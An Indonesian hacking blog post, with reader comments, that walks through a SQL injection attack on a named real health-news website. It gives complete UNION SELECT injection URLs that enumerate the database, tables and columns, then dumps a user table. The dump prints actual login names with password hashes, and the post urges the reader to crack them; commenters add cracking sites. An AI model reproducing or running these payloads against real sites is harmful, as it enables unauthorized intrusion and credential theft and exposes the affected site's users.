LFI to RCE via access_log injection

SQL Injection

[x]

otree kemaren kita udah belajar gimana "Mendeteksi SQL Injection Vulnerability"
sekarang gw bakal buat tutor gimana ngeluarin table, column dan informasi yang ada didalamnya

[x]

contoh target kita kali ini dari dalam negeri ajah ya... :)

http://www.solusisehat.net/berita.php?id=227

keluarin magic numbernya

http://www.solusisehat.net/berita.php?id=-227 union select 1,2,3,4,5,6,7--

angka2 yang keluar adalah 2, 3 dan 5 <-- thats our magic number sekarang coba kita liat versi, database dan user dari target http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,version(),database(),4,user(),6,7-- nah udah keliatankan versi, nama database sama usernya? ternyata versi 5 euy... :) sekarang kita liat table2 yang ada didalam databasenya disini gw make command information_schema untuk ngeluarin table sama columnnya. http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(table_name),database(),4,user(),6,7%20from%20information_schema.tables%20where%20table_schema=database()-- command yang gw pake untuk ngeluarin table adalah group_concat(table_name) from information_schema.tables where table_schema=database() masukkan command group_concat(table_name) pada salah satu angka yang udah dikeluarin sebelumnya kemudian command from information_schema.tables where table_schema=database() pada akhir angkanya nah keliatan semua table yang ada dalam databasenya kan? disini kita hanya akan mencari loginnya ajah ya... diantara table2 yang keluar disitu ada table ssc_user, kita akan ngeluarin column yang ada didalam table ssc_user sebelumnya kita konvert table ssc_user menjadi hexa dulu 7373635f75736572 http://www.paulschou.com/tools/xlate/ <-- konvertnya disini

lalu kita keluarin columnnya

http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(column_name),database(),4,user(),6,7%20from%20information_schema.columns%20where%20table_name=0x7373635f75736572--

command yang gw pake untuk ngeluarin column adalah group_concat(column_name) from information_schema.columns where table_name=[nama table]

[nama table] disini adalah ssc_user yang sudah kita konvert menjadi hexa yaitu 7373635f75736572

group_concat(column_name) from information_schema.columns where table_name=0x7373635f75736572

nah disini kita bisa liat column yang ada dalam table ssc_user

sekarang kita akan ngeluarin informasi dari column nama_login dan sandi

http://www.solusisehat.net/berita.php?id=-227%20union%20select%201,group_concat(nama_login,0x3a,sandi),3,4,5,6,%207%20from%20ssc_user--

admin:2fbd2ef919d06770,ginung:2350538419934368,Ardi:0f5219dc11e0f77a,yesi:7b10fc7008fadabc,noviana:533e8d92566a1adc

sekarang keliatan semua informasi yang ada dalam column nama_login dan sandi kan?

tinggal dicrack ajah deh xixixi.. :)

[x]

google.com
greetz MainHack BrotherHood

[x]

Comments

Anonymous said…
wedew yg keluar kok MD5 cari tools nya dimana tuch untuk decript
evilc0de said…
iya yang kluar emang md5.
kalo mo crack bisa pake software ato kalo maw crack online bisa juga.
http://passcracking.com
http://milw0rm.com
banyak koq site2 online yang sediain crack tools
Anonymous said…
euy Ge,,
sebenarnya tutor lu dah bagus..
tapi kurangnya kenapa lu ga jelasin dikit lagi dari mana dapat angka aneh (7373635f75736572)
jadi orang kan bisa lebih paham
btw.. klo ga salah aku, itu bukan MD5..
Anonymous said…
Eh maksud gue 0x
apaan seh itu :) 0x7373635f75736572
Anonymous said…
Sebenernya ntuh kode "7373635F75736572" asalnya dari table "ssc_user" cuman supaya bisa dibaca ama SQL jadi di convert ke HEX dulu en ditambah "0x" didepannya.. CMIIW
evilc0de said…
@ Cungkee
sorry baru bales bro..

itu emang bukan md5 tapi itu hasil konvert menjadi hexadesimal.

dari mana dapet angka2 aneh itu yah..
angka2 aneh itu adalah hasil konvert nama table menjadi hexadesimal dalam hal ini ssc_user.

kalo 0x itu adalah jembatan kalo kata gw. jembatan penghubung antara karakter dengan angka2 hexadesimal yang udah kita konvert tadi.

CMIIW